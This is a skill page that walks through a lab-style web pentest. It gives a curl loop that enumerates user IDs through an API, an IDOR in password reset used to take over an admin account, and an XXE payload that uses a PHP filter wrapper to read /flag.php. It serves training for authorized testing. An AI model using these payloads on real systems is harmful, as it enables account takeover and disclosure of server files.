Step-by-step guide to exploiting IDOR vulnerabilities and XXE injection in a web application pentest scenario. Learn privilege escalation techniques using API enumeration and PHP filter chains.
A practical walkthrough for identifying and exploiting Insecure Direct Object Reference (IDOR) vulnerabilities and XML External Entity (XXE) injection in web applications during authorized penetration testing engagements.
You are performing an authorized penetration test for a company's social network web application. Your objective is to escalate privileges and exploit vulnerabilities to read the flag located at `/flag.php`.
**Target:** `94.237.53.52:5948` (example target - replace with your actual authorized target)
**Initial Credentials:**
1. **Configure your HTTP proxy** (Caido or Burp Suite) to intercept traffic
2. **Navigate to the target application** at the provided IP and port
3. **Log in using the provided credentials** and capture the authentication flow
4. **Analyze the login sequence** in your proxy:
- Look for 301 redirect responses following successful login
- Identify 200 OK responses
- Note any API endpoints being called
5. **Identify API endpoints** that reference user-specific data
- Common pattern: `/api.php/user/{id}` or similar
- In this scenario, focus on endpoints like `/api.php/user/74`
6. **Enumerate user IDs** by modifying the user parameter:
```bash
# Example enumeration using curl
for i in {1..100}; do
curl -s "http://TARGET:PORT/api.php/user/$i" \
-H "Cookie: YOUR_SESSION_COOKIE" \
| grep -i "admin\|username"
done
```
7. **Locate the admin user** through enumeration
- Document the admin user ID when found
- Note any exposed information (username, email, etc.)
8. **Navigate to the password reset functionality** (e.g., `/reset.php`)
9. **Test for IDOR in password reset**:
- Intercept the password reset request
- Modify the user ID parameter to target the admin account
- Submit a new password for the admin user
10. **Verify admin access** by logging in with the newly set admin credentials
11. **Identify XML input points** in the application
- Common locations: contact forms, data export/import features, API endpoints accepting XML
12. **Craft an XXE payload** using PHP filter wrapper to exfiltrate `/flag.php`:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [
<!ENTITY Test SYSTEM "php://filter/convert.base64-encode/resource=/flag.php">
]>
<root>
<name>&Test;</name>
<details>XXE exploitation test</details>
<date></date>
</root>
```
13. **Submit the XXE payload** through the identified XML input point
14. **Extract and decode the response**:
```bash
# Copy the base64-encoded response
echo "BASE64_OUTPUT_HERE" | base64 -d
```
15. **Retrieve the flag** from the decoded PHP source code
Leave a review
No reviews yet. Be the first to review this skill!
# Download SKILL.md from killerskills.ai/api/skills/web-app-pentest-idor-and-xxe-exploitation-q2si15/raw